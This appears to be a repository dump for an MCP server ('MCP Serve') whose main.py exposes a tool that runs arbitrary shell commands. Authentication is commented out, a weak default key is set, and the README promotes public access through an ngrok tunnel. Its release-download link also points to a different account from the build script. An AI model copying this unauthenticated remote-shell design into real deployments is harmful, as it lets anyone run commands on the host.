# Directory Structure

```
├── .dockerignore
├── .vscode
│   └── launch.json
├── docker-compose.yml
├── Dockerfile
├── Dockerfile.ubuntu
├── LICENSE
├── main.py
├── README.md
├── requirements.txt
└── scripts
    └── build.sh
```

# Files

--------------------------------------------------------------------------------
/.dockerignore:
--------------------------------------------------------------------------------

```
__pycache__/
*.py[cod]
*$py.class
*.so
.git/
.github/
.gitignore
.vscode/
.env
.pytest_cache/
.coverage
htmlcov/ 
scripts/
Docker*
docker-compose.yml
```

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------

```markdown
# MCP Serve: A Powerful Server for Deep Learning Models

Welcome to the MCP Serve repository, a lightweight server for working with Deep Learning models. It provides a simple MCP server with shell execution, local access from anywhere via an ngrok tunnel, and an optional Ubuntu 24.04 container image for Docker deployment. If you're an AI enthusiast, this repository is worth a look!

## Features 🚀

- 🔹 **Simple MCP Server**: Easily launch your Deep Learning models and serve them through the MCP server.
- 🔹 **Shell Execution**: Execute commands directly from the server shell for maximum control.
- 🔹 **Ngrok Connectivity**: Connect to your local server via an ngrok tunnel for seamless access from anywhere.
- 🔹 **Ubuntu 24.04 Container Hosting**: Use Docker to host an Ubuntu 24.04 container for a stable environment.
- 🔹 **Cutting-Edge Stack**: Designed to work with Anthropic, Gemini, LangChain, and other modern tooling.
- 🔹 **Model Context Protocol Support**: Seamless integration with a range of Deep Learning models.
- 🔹 **OpenAI Integration**: Connect effortlessly with OpenAI for advanced AI capabilities.

## Repository Topics 📋

✨ anthropic, claude, container, deepseek, docker, gemini, langchain, langgraph, mcp, modelcontextprotocol, ngrok, openai, sonnet, ubuntu, vibecoding

## Download App 📦

[Download the latest release](https://github.com/mark-oori/mcpserve/releases) and launch it to start exploring.

## Getting Started 🏁

To get started with MCP Serve, follow these simple steps:

1. **Clone the Repository**: `git clone https://github.com/mark-oori/mcpserve.git`
2. **Install Dependencies**: `pip install -r requirements.txt`
3. **Launch the MCP Server**: `python main.py`

## Contributing 🤝

We welcome contributions to make MCP Serve even more robust and feature-rich. Feel free to fork the repository, make your changes, and submit a pull request.

## Community 🌟

Join our community of AI enthusiasts, developers, and researchers to discuss the latest trends in Deep Learning, AI frameworks, and more. Share your projects, ask questions, and collaborate with like-minded individuals.

## Support ℹ️

If you encounter any issues with MCP Serve or have any questions, please check the "Issues" section of the repository or reach out to our support team for assistance.

## License 📜

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

---

Dive into the world of Deep Learning with MCP Serve and revolutionize the way you interact with AI models. Whether you're a seasoned AI professional or a beginner exploring the possibilities of AI, MCP Serve has something for everyone. Start your Deep Learning journey today! 🌌


Happy coding! 💻🤖
```

--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------

```
langchain-mcp-adapters
httpx
python-dotenv
```

--------------------------------------------------------------------------------
/docker-compose.yml:
--------------------------------------------------------------------------------

```yaml
services:
  mcp:
    container_name: mcp
    build: .
    ports:
      - "8005:8005"
    environment:
      # - MCP_API_KEY=${MCP_API_KEY:-test1234} # Not ready yet, need updates to mcp library. Can be done artificially for now.
      - FASTMCP_DEBUG=true
      - FASTMCP_LOG_LEVEL=DEBUG
    volumes:
      - .:/app
    restart: unless-stopped 
```

--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------

```dockerfile
# Small python 3.11 docker file
FROM python:3.11-slim

# Set working directory
WORKDIR /app

# Set environment variables
ENV PYTHONDONTWRITEBYTECODE=1
ENV PYTHONUNBUFFERED=1

# Install dependencies
COPY requirements.txt .
RUN pip install --no-cache-dir --upgrade pip && \
    pip install --no-cache-dir uv && \
    uv pip install --system --no-cache-dir -r requirements.txt

# Copy application code
COPY . .

# Expose port
EXPOSE 8005

# Run the application
CMD ["python", "main.py"]

```

--------------------------------------------------------------------------------
/.vscode/launch.json:
--------------------------------------------------------------------------------

```json
{
    "version": "0.2.0",
    "configurations": [
        {
            "name": "Python: MCP Server",
            "type": "debugpy",
            "request": "launch",
            "program": "${workspaceFolder}/main.py",
            "console": "integratedTerminal",
            "justMyCode": false,
            "env": {
                "PYTHONPATH": "${workspaceFolder}",
                "FASTMCP_DEBUG": "true",
                "FASTMCP_LOG_LEVEL": "DEBUG"
            }
        }
    ]
}

```

--------------------------------------------------------------------------------
/scripts/build.sh:
--------------------------------------------------------------------------------

```bash
#!/bin/bash

SHORT_SHA=$(git rev-parse --short HEAD)

# Set TAG to first argument if provided, otherwise use SHORT_SHA
TAG=${1:-$SHORT_SHA}

########################################################################
## Container Registry
########################################################################
# Define your registry parameters
REPOSITORY="ryaneggz"   # Registry namespace (e.g. your Docker Hub username)
PROJECT_ID="mcpserve"   # Image name

# Build the Docker image (note: --squash requires the Docker daemon's experimental mode)
docker build --squash -t "$REPOSITORY/$PROJECT_ID:$TAG" .
docker tag "$REPOSITORY/$PROJECT_ID:$TAG" "$REPOSITORY/$PROJECT_ID:latest"

########################################################################
## Docker Hub
########################################################################
echo ""
## Prompt to push the image to Docker Hub
echo "Do you want to push the image to Docker Hub? (y/n)"
read -r response
if [[ $response =~ ^([yY][eE][sS]|[yY])$ ]]
then
  docker push $REPOSITORY/$PROJECT_ID:$TAG
  docker push $REPOSITORY/$PROJECT_ID:latest
fi

```

--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------

```python
# main.py
import os
import subprocess
from mcp.server.fastmcp import FastMCP
from starlette.exceptions import HTTPException
from dotenv import load_dotenv

# Load environment variables from .env file
load_dotenv()

# Application settings (os.getenv returns strings, so coerce types explicitly)
APP_NAME = os.getenv("APP_NAME", "Terminal")
APP_DEBUG = os.getenv("APP_DEBUG", "true").lower() in ("1", "true", "yes")
APP_LOG_LEVEL = os.getenv("APP_LOG_LEVEL", "DEBUG")
APP_PORT = int(os.getenv("APP_PORT", "8005"))
MCP_API_KEY = os.getenv("MCP_API_KEY", "test1234")

# Middleware function to check API key authentication
def middleware(request):
    # Verify the x-api-key header matches the environment variable
    if request.headers.get("x-api-key") != MCP_API_KEY:
        raise HTTPException(status_code=401, detail="Unauthorized")

# Server configuration settings
settings = {
    'debug': APP_DEBUG,          # Enable debug mode
    'port': APP_PORT,          # Port to run server on
    'log_level': APP_LOG_LEVEL,  # Logging verbosity
    # 'middleware': middleware, # Authentication middleware
}

# Initialize FastMCP server instance
mcp = FastMCP(name=APP_NAME, **settings)

@mcp.tool()
async def shell_command(command: str) -> str:
    """Execute a shell command (runs arbitrary code on the host -- use with care)."""
    try:
        return subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT).decode()
    except subprocess.CalledProcessError as exc:
        return f"exit code {exc.returncode}: {exc.output.decode()}"

if __name__ == "__main__":
    print(f"Starting MCP server... {APP_NAME} on port {APP_PORT}")
    # Start server with Server-Sent Events transport
    mcp.run(transport="sse")
```
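The `shell_command` tool above executes whatever string it receives, so exposing it beyond localhost is risky, especially while the API-key middleware is commented out. A minimal hardening sketch follows; the allowlist contents and the `run_allowed` helper are illustrative assumptions, not part of the repository:

```python
import shlex
import subprocess

# Hypothetical allowlist of permitted executables; adjust to your deployment.
ALLOWED_BINARIES = {"ls", "cat", "echo", "uptime"}

def run_allowed(command: str, timeout: float = 10.0) -> str:
    """Run a command only if its executable is on the allowlist."""
    argv = shlex.split(command)
    if not argv or argv[0] not in ALLOWED_BINARIES:
        raise PermissionError(f"command not allowed: {command!r}")
    # shell=False avoids shell injection; timeout bounds runaway commands.
    result = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    if result.returncode != 0:
        raise RuntimeError(f"exit {result.returncode}: {result.stderr.strip()}")
    return result.stdout
```

A wrapper along these lines could replace the `subprocess.check_output` call inside `shell_command` whenever the server must face an untrusted network.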